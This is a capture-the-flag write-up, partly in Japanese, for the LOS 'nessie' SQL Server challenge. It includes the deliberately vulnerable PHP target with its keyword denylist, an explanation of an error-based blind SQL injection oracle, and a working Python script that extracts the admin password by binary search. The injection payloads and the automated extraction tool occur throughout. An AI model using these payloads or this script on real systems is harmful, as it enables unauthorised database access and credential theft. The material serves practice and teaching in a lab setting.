<?php
// LOS "nessie" challenge endpoint. This is the deliberately vulnerable target
// a player attacks, so the injection below is the intended solve path, not a
// defect to patch here. login_chk(), mssql_connect(), mssql_error() and
// solve() are presumably defined in config.php; they are not visible in this file.
include "./config.php";
login_chk();
$conn = mssql_connect();

// Case-insensitive denylist applied to both parameters. It blocks stacked
// statements (';'), time-based probing ('waitfor'), the table-name prefix
// ('prob') and any underscore, but not CASE/len/ascii/substring, so a
// conditional-error oracle remains possible.
$denylist = '/master|sys|information|prob|;|waitfor|_/i';
if (preg_match($denylist, $_GET['id'])) exit("No Hack ~_~");
if (preg_match($denylist, $_GET['pw'])) exit("No Hack ~_~");

// Both inputs are interpolated unescaped into the statement (SQL injection),
// and the assembled statement is echoed back to the client before it runs.
$sql = "select id from prob_nessie where id='{$_GET['id']}' and pw='{$_GET['pw']}'";
echo "<hr>query : <strong>{$sql}</strong><hr><br>";
sqlsrv_query($conn, $sql);
// Any driver error is returned verbatim to the client; that verbose error
// channel is what makes an error-based blind injection work against this page.
if (sqlsrv_errors()) exit(mssql_error(sqlsrv_errors()));

// Win condition: the submitted pw must be identical (===) to admin's stored
// pw, so an attacker has to recover the exact bytes, not just a matching hash.
$sql = "select pw from prob_nessie where id='admin'";
$row = sqlsrv_fetch_array(sqlsrv_query($conn, $sql));
if ($row['pw'] === $_GET['pw']) solve("nessie");
highlight_file(__FILE__);
特徴は以下。
- SQL Server
- id,pwが入力可能
- master, sys, information, prob, ;, waitfor, _ がフィルタリング（preg_match に `/i` が付いているので大文字小文字は区別されない）
- エラーが出れば表示される
- adminのpwを取得してくる必要がある
Error-based Blind SQL Injectionしよう
Error-based Blind SQL Injection
SQL Serverでエラーを出したいとき
Error: [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Conversion failed when converting the varchar value 'z' to data type int.
- [LOS] nessie
1=(case when 条件 then 'z' end)
とすれば、条件がtrueのときは 'z' を int に変換しようとして上記のエラーが出る。条件がfalseのときは ELSE のない CASE が NULL を返すだけなのでエラーは出ない。この違いが1bitのオラクルになる。
なるほど?以下のように式を作ろう。
以下で長さを抜き取る。
admin' and 1=(case when {md} <= len(pw) then 'z' end) --
以下で中身を1文字ずつ抜き取る（SQL Server の substring は1始まりなので位置は i+1 になる）。
admin' and 1=(case when {md} <= ascii(substring(pw,{i+1},1)) then 'z' end) --
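"""Error-based blind SQL injection for the LOS "nessie" challenge (SQL Server).

The endpoint interpolates ?id= into a query and echoes any driver error. The
payload ``1=(case when <cond> then 'z' end)`` raises "Conversion failed when
converting the varchar value 'z' to data type int" only when <cond> is true
(a CASE without ELSE yields NULL otherwise, and 1=NULL is simply not an
error), so the presence of the error message is a one-bit oracle. Each value
is resolved by binary search: first the length of admin's pw, then the ASCII
code of every character.

``requests`` is imported inside main() so the oracle helpers can be imported
and unit-tested without the HTTP dependency or network access.
"""
from collections.abc import Callable

URL = "https://los.rubiya.kr/chall/nessie_7cd2.php"
# PHPSESSID of a logged-in browser session; the target's login_chk() rejects
# requests without one, so fill this in before running.
COOKIE = {'PHPSESSID': ''}

# Prefix of the driver error the target echoes when the CASE forces a
# varchar->int conversion failure, i.e. when the injected condition was true.
ERROR_MARKER = "Error: [Microsoft][ODBC Driver 17 for SQL Server]"
# Body the target returns when a parameter tripped its denylist.
FILTER_MARKER = "No Hack ~_~"

# Exclusive upper sentinels for the binary searches; they must exceed the
# real length / character code or the search silently caps at sentinel-1.
MAX_PW_LEN = 120
MAX_CHAR_CODE = 256


def check(data: str) -> bool:
    """True when the response body carries the conversion error (the condition held)."""
    return ERROR_MARKER in data


def length_payload(md: int) -> str:
    """Injected id that errors iff md <= len(pw).

    The trailing ``--`` comments out the rest of the original WHERE clause
    (the ``and pw='...'`` part), so only our condition decides the outcome.
    """
    return f"admin' and 1=(case when {md} <= len(pw) then 'z' end) --"


def char_payload(md: int, pos: int) -> str:
    """Injected id that errors iff md <= ascii(pw[pos]); pos is 1-based like SQL Server's substring."""
    return f"admin' and 1=(case when {md} <= ascii(substring(pw,{pos},1)) then 'z' end) --"


def binary_search_max(oracle: Callable[[int], bool], ok: int, ng: int) -> int:
    """Largest v with ok < v < ng for which oracle(v) is True, or ok if there is none.

    Requires oracle to be monotone (True up to some threshold, then False),
    which holds for ``v <= secret``. ``ok`` is the lower sentinel assumed to
    satisfy the oracle, ``ng`` the exclusive upper sentinel assumed not to.
    Prints each probed value so progress is visible on slow targets.
    """
    while ok + 1 != ng:
        md = (ok + ng) // 2
        print(f"[+] try {md}")
        if oracle(md):
            ok = md
        else:
            ng = md
    return ok


def extract_password(fetch: Callable[[str], str], max_len: int = MAX_PW_LEN) -> str:
    """Recover admin's pw through the error oracle.

    fetch(payload) must return the response body for GET ?id=<payload> made
    with a valid session.

    Raises RuntimeError if the target answers "No Hack ~_~" (denylist hit) or
    if the oracle never fires for the length or for a character position --
    the naive loop would instead return an empty string or NUL characters and
    hide an expired session or a broken payload.
    """
    def ask(payload: str) -> bool:
        body = fetch(payload)
        if FILTER_MARKER in body:
            raise RuntimeError(f"payload tripped the target's denylist: {payload!r}")
        return check(body)

    length = binary_search_max(lambda md: ask(length_payload(md)), 0, max_len)
    print(f"[*] length = {length}")
    if length == 0:
        raise RuntimeError("oracle never fired for the length probe; is PHPSESSID set and still valid?")

    ans = ""
    for pos in range(1, length + 1):
        code = binary_search_max(lambda md: ask(char_payload(md, pos)), 0, MAX_CHAR_CODE)
        if code == 0:
            raise RuntimeError(f"oracle never fired for character {pos}")
        ans += chr(code)
        print(f"[*] {ans}")
    return ans


def main() -> None:
    """Run the attack against URL with COOKIE and print the recovered pw."""
    import requests  # local import: keeps the pure helpers above importable without it

    def fetch(payload: str) -> str:
        # Explicit timeout so a stalled server cannot hang the search forever.
        return requests.get(URL, params={'id': payload}, cookies=COOKIE, timeout=15).text

    ans = extract_password(fetch)
    print(f"[*] find! {ans}")


if __name__ == "__main__":
    main()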